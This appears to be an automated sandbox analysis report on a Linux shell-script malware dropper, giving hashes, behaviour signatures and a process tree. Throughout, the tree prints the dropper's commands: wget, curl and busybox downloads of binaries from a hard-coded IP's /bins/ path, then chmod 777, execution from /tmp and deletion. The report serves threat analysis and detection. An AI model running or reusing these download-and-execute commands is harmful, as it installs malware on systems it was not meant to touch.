Analysis

  • max time kernel
    31s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    14-11-2024 02:38

General

  • Target

    74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh

  • Size

    10KB

  • MD5

    b511b6f4aeffa16d10d0f7ef26b0e23b

  • SHA1

    83f64c0a7d2007fd0182aaae9636c5bbba453efe

  • SHA256

    74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc

  • SHA512

    a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4

  • SSDEEP

    96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 28 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 28 IoCs
  • System Network Configuration Discovery 1 TTPs 10 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
    /tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
    1⤵
      PID:1526
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1527
        • /usr/bin/wget
          wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
          2⤵
            PID:1528
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
            2⤵
            • Writes file to tmp directory
            PID:1532
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
            2⤵
              PID:1533
            • /bin/chmod
              chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
              2⤵
              • File and Directory Permissions Modification
              PID:1534
            • /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
              ./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
              2⤵
              • Executes dropped EXE
              PID:1535
            • /bin/rm
              rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
              2⤵
                PID:1536
              • /usr/bin/wget
                wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                2⤵
                  PID:1537
                • /usr/bin/curl
                  curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                  2⤵
                  • Writes file to tmp directory
                  PID:1538
                • /bin/busybox
                  /bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                  2⤵
                    PID:1539
                  • /bin/chmod
                    chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1540
                  • /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                    ./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                    2⤵
                    • Executes dropped EXE
                    PID:1541
                  • /bin/rm
                    rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                    2⤵
                      PID:1542
                    • /usr/bin/wget
                      wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                      2⤵
                        PID:1543
                      • /usr/bin/curl
                        curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                        2⤵
                        • Writes file to tmp directory
                        PID:1544
                      • /bin/busybox
                        /bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                        2⤵
                          PID:1545
                        • /bin/chmod
                          chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1546
                        • /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                          ./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                          2⤵
                          • Executes dropped EXE
                          PID:1547
                        • /bin/rm
                          rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                          2⤵
                            PID:1548
                          • /usr/bin/wget
                            wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                            2⤵
                              PID:1549
                            • /usr/bin/curl
                              curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                              2⤵
                              • Writes file to tmp directory
                              PID:1550
                            • /bin/busybox
                              /bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                              2⤵
                                PID:1551
                              • /bin/chmod
                                chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                2⤵
                                • File and Directory Permissions Modification
                                PID:1552
                              • /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                ./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                2⤵
                                • Executes dropped EXE
                                PID:1553
                              • /bin/rm
                                rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                2⤵
                                  PID:1554
                                • /usr/bin/wget
                                  wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                  2⤵
                                    PID:1555
                                  • /usr/bin/curl
                                    curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:1556
                                  • /bin/busybox
                                    /bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                    2⤵
                                      PID:1557
                                    • /bin/chmod
                                      chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:1558
                                    • /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                      ./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1559
                                    • /bin/rm
                                      rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                      2⤵
                                        PID:1560
                                      • /usr/bin/wget
                                        wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                        2⤵
                                          PID:1561
                                        • /usr/bin/curl
                                          curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:1562
                                        • /bin/busybox
                                          /bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                          2⤵
                                            PID:1563
                                          • /bin/chmod
                                            chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:1564
                                          • /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                            ./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                            2⤵
                                            • Executes dropped EXE
                                            PID:1565
                                          • /bin/rm
                                            rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                            2⤵
                                              PID:1566
                                            • /usr/bin/wget
                                              wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                              2⤵
                                                PID:1567
                                              • /usr/bin/curl
                                                curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                2⤵
                                                • Writes file to tmp directory
                                                PID:1568
                                              • /bin/busybox
                                                /bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                2⤵
                                                  PID:1569
                                                • /bin/chmod
                                                  chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:1570
                                                • /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                  ./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:1571
                                                • /bin/rm
                                                  rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                  2⤵
                                                    PID:1572
                                                  • /usr/bin/wget
                                                    wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                    2⤵
                                                      PID:1573
                                                    • /usr/bin/curl
                                                      curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                      2⤵
                                                      • Writes file to tmp directory
                                                      PID:1574
                                                    • /bin/busybox
                                                      /bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                      2⤵
                                                        PID:1575
                                                      • /bin/chmod
                                                        chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:1576
                                                      • /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                        ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:1577
                                                      • /bin/rm
                                                        rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                        2⤵
                                                          PID:1578
                                                        • /usr/bin/wget
                                                          wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                          2⤵
                                                            PID:1579
                                                          • /usr/bin/curl
                                                            curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                            2⤵
                                                            • Writes file to tmp directory
                                                            PID:1580
                                                          • /bin/busybox
                                                            /bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                            2⤵
                                                              PID:1581
                                                            • /bin/chmod
                                                              chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                              2⤵
                                                              • File and Directory Permissions Modification
                                                              PID:1582
                                                            • /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                              ./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1583
                                                            • /bin/rm
                                                              rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                              2⤵
                                                                PID:1584
                                                              • /usr/bin/wget
                                                                wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                2⤵
                                                                  PID:1585
                                                                • /usr/bin/curl
                                                                  curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                  2⤵
                                                                  • Writes file to tmp directory
                                                                  PID:1586
                                                                • /bin/busybox
                                                                  /bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                  2⤵
                                                                    PID:1587
                                                                  • /bin/chmod
                                                                    chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:1588
                                                                  • /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                    ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:1589
                                                                  • /bin/rm
                                                                    rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                    2⤵
                                                                      PID:1590
                                                                    • /usr/bin/wget
                                                                      wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:1591
                                                                    • /usr/bin/curl
                                                                      curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      • Writes file to tmp directory
                                                                      PID:1592
                                                                    • /bin/busybox
                                                                      /bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:1593
                                                                    • /bin/chmod
                                                                      chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • File and Directory Permissions Modification
                                                                      PID:1594
                                                                    • /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      ./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • System Network Configuration Discovery
                                                                      PID:1595
                                                                    • /bin/rm
                                                                      rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:1596
                                                                    • /usr/bin/wget
                                                                      wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                      2⤵
                                                                        PID:1597
                                                                      • /usr/bin/curl
                                                                        curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                        2⤵
                                                                        • Writes file to tmp directory
                                                                        PID:1598
                                                                      • /bin/busybox
                                                                        /bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                        2⤵
                                                                          PID:1599
                                                                        • /bin/chmod
                                                                          chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                          2⤵
                                                                          • File and Directory Permissions Modification
                                                                          PID:1600
                                                                        • /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                          ./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:1601
                                                                        • /bin/rm
                                                                          rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                          2⤵
                                                                            PID:1602
                                                                          • /usr/bin/wget
                                                                            wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                            2⤵
                                                                              PID:1603
                                                                            • /usr/bin/curl
                                                                              curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                              2⤵
                                                                              • Writes file to tmp directory
                                                                              PID:1604
                                                                            • /bin/busybox
                                                                              /bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                              2⤵
                                                                                PID:1605
                                                                              • /bin/chmod
                                                                                chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                2⤵
                                                                                • File and Directory Permissions Modification
                                                                                PID:1606
                                                                              • /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                ./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:1607
                                                                              • /bin/rm
                                                                                rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                2⤵
                                                                                  PID:1608
                                                                                • /usr/bin/wget
                                                                                  wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                  2⤵
                                                                                    PID:1609
                                                                                  • /usr/bin/curl
                                                                                    curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                    2⤵
                                                                                    • Writes file to tmp directory
                                                                                    PID:1610
                                                                                  • /bin/busybox
                                                                                    /bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                    2⤵
                                                                                      PID:1611
                                                                                    • /bin/chmod
                                                                                      chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                      2⤵
                                                                                      • File and Directory Permissions Modification
                                                                                      PID:1612
                                                                                    • /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                      ./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1613
                                                                                    • /bin/rm
                                                                                      rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                      2⤵
                                                                                        PID:1614
                                                                                      • /usr/bin/wget
                                                                                        wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                        2⤵
                                                                                          PID:1615
                                                                                        • /usr/bin/curl
                                                                                          curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                          2⤵
                                                                                          • Writes file to tmp directory
                                                                                          PID:1616
                                                                                        • /bin/busybox
                                                                                          /bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                          2⤵
                                                                                            PID:1617
                                                                                          • /bin/chmod
                                                                                            chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                            2⤵
                                                                                            • File and Directory Permissions Modification
                                                                                            PID:1618
                                                                                          • /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                            ./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1619
                                                                                          • /bin/rm
                                                                                            rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
                                                                                            2⤵
                                                                                              PID:1620
                                                                                            • /usr/bin/wget
                                                                                              wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                              2⤵
                                                                                                PID:1621
                                                                                              • /usr/bin/curl
                                                                                                curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                2⤵
                                                                                                • Writes file to tmp directory
                                                                                                PID:1622
                                                                                              • /bin/busybox
                                                                                                /bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                2⤵
                                                                                                  PID:1623
                                                                                                • /bin/chmod
                                                                                                  chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                  2⤵
                                                                                                  • File and Directory Permissions Modification
                                                                                                  PID:1624
                                                                                                • /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                  ./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1625
                                                                                                • /bin/rm
                                                                                                  rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
                                                                                                  2⤵
                                                                                                    PID:1626
                                                                                                  • /usr/bin/wget
                                                                                                    wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                    2⤵
                                                                                                      PID:1627
                                                                                                    • /usr/bin/curl
                                                                                                      curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                      2⤵
                                                                                                      • Writes file to tmp directory
                                                                                                      PID:1628
                                                                                                    • /bin/busybox
                                                                                                      /bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                      2⤵
                                                                                                        PID:1629
                                                                                                      • /bin/chmod
                                                                                                        chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                        2⤵
                                                                                                        • File and Directory Permissions Modification
                                                                                                        PID:1630
                                                                                                      • /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                        ./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1631
                                                                                                      • /bin/rm
                                                                                                        rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
                                                                                                        2⤵
                                                                                                          PID:1632
                                                                                                        • /usr/bin/wget
                                                                                                          wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                          2⤵
                                                                                                            PID:1633
                                                                                                          • /usr/bin/curl
                                                                                                            curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                            2⤵
                                                                                                            • Writes file to tmp directory
                                                                                                            PID:1634
                                                                                                          • /bin/busybox
                                                                                                            /bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                            2⤵
                                                                                                              PID:1635
                                                                                                            • /bin/chmod
                                                                                                              chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                              2⤵
                                                                                                              • File and Directory Permissions Modification
                                                                                                              PID:1636
                                                                                                            • /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                              ./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1637
                                                                                                            • /bin/rm
                                                                                                              rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
                                                                                                              2⤵
                                                                                                                PID:1638
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                2⤵
                                                                                                                  PID:1639
                                                                                                                • /usr/bin/curl
                                                                                                                  curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                  2⤵
                                                                                                                  • Writes file to tmp directory
                                                                                                                  PID:1640
                                                                                                                • /bin/busybox
                                                                                                                  /bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                  2⤵
                                                                                                                    PID:1641
                                                                                                                  • /bin/chmod
                                                                                                                    chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                    2⤵
                                                                                                                    • File and Directory Permissions Modification
                                                                                                                    PID:1642
                                                                                                                  • /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                    ./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1643
                                                                                                                  • /bin/rm
                                                                                                                    rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
                                                                                                                    2⤵
                                                                                                                      PID:1644
                                                                                                                    • /usr/bin/wget
                                                                                                                      wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                      2⤵
                                                                                                                        PID:1645
                                                                                                                      • /usr/bin/curl
                                                                                                                        curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                        2⤵
                                                                                                                        • Writes file to tmp directory
                                                                                                                        PID:1646
                                                                                                                      • /bin/busybox
                                                                                                                        /bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                        2⤵
                                                                                                                          PID:1647
                                                                                                                        • /bin/chmod
                                                                                                                          chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                          2⤵
                                                                                                                          • File and Directory Permissions Modification
                                                                                                                          PID:1648
                                                                                                                        • /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                          ./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:1649
                                                                                                                        • /bin/rm
                                                                                                                          rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
                                                                                                                          2⤵
                                                                                                                            PID:1650
                                                                                                                          • /usr/bin/wget
                                                                                                                            wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                            2⤵
                                                                                                                              PID:1651
                                                                                                                            • /usr/bin/curl
                                                                                                                              curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                              2⤵
                                                                                                                              • Writes file to tmp directory
                                                                                                                              PID:1652
                                                                                                                            • /bin/busybox
                                                                                                                              /bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                              2⤵
                                                                                                                                PID:1653
                                                                                                                              • /bin/chmod
                                                                                                                                chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                                2⤵
                                                                                                                                • File and Directory Permissions Modification
                                                                                                                                PID:1654
                                                                                                                              • /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                                ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1655
                                                                                                                              • /bin/rm
                                                                                                                                rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
                                                                                                                                2⤵
                                                                                                                                  PID:1656
                                                                                                                                • /usr/bin/wget
                                                                                                                                  wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                  2⤵
                                                                                                                                    PID:1657
                                                                                                                                  • /usr/bin/curl
                                                                                                                                    curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                    2⤵
                                                                                                                                    • Writes file to tmp directory
                                                                                                                                    PID:1658
                                                                                                                                  • /bin/busybox
                                                                                                                                    /bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                    2⤵
                                                                                                                                      PID:1659
                                                                                                                                    • /bin/chmod
                                                                                                                                      chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                      2⤵
                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                      PID:1660
                                                                                                                                    • /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                      ./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1661
                                                                                                                                    • /bin/rm
                                                                                                                                      rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
                                                                                                                                      2⤵
                                                                                                                                        PID:1662
                                                                                                                                      • /usr/bin/wget
                                                                                                                                        wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                        2⤵
                                                                                                                                          PID:1663
                                                                                                                                        • /usr/bin/curl
                                                                                                                                          curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                          2⤵
                                                                                                                                          • Writes file to tmp directory
                                                                                                                                          PID:1664
                                                                                                                                        • /bin/busybox
                                                                                                                                          /bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                          2⤵
                                                                                                                                            PID:1665
                                                                                                                                          • /bin/chmod
                                                                                                                                            chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                            2⤵
                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                            PID:1666
                                                                                                                                          • /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                            ./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1667
                                                                                                                                          • /bin/rm
                                                                                                                                            rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
                                                                                                                                            2⤵
                                                                                                                                              PID:1668
                                                                                                                                            • /usr/bin/wget
                                                                                                                                              wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                              2⤵
                                                                                                                                                PID:1669
                                                                                                                                              • /usr/bin/curl
                                                                                                                                                curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                2⤵
                                                                                                                                                • Writes file to tmp directory
                                                                                                                                                PID:1670
                                                                                                                                              • /bin/busybox
